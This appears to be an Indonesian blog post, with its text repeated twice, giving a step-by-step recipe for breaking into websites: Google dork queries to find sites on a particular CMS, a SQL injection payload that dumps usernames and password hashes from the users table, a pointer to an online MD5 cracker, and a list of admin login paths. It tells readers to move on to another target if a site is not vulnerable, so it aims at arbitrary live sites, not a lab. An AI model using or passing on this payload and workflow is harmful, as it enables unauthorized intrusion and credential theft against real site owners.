Pertama Buka Google.com dan gunakan salah satu dork di bawah ini
inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html inurl:statis-1-visimisi.html inurl:statis-1-tujuan.html
Jika sudah dapat website yang akan dieksekusi tambahkan exploit di bawah ini (exp: http:site.com/exploit)
exploit : /statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html ubah sendiri exploitnya :') ( gak vuln cari target lain )
Jika sudah selesai klik kanan lihat source codenya kemudian ketemu kode md5nya.
kalau udah md5nya hash di sini > https://hashkiller.co.uk/md5-decrypter.aspx
Setelah itu login
biasanya admin login nya /redaktur /adminweb /administrator /redaktur/index.php /adminlogin /admin /login.php
Read More
inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html inurl:statis-1-visimisi.html inurl:statis-1-tujuan.html
Jika sudah dapat website yang akan dieksekusi tambahkan exploit di bawah ini (exp: http:site.com/exploit)
exploit : /statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html ubah sendiri exploitnya :') ( gak vuln cari target lain )
Jika sudah selesai klik kanan lihat source codenya kemudian ketemu kode md5nya.
kalau udah md5nya hash di sini > https://hashkiller.co.uk/md5-decrypter.aspx
Setelah itu login
biasanya admin login nya /redaktur /adminweb /administrator /redaktur/index.php /adminlogin /admin /login.php
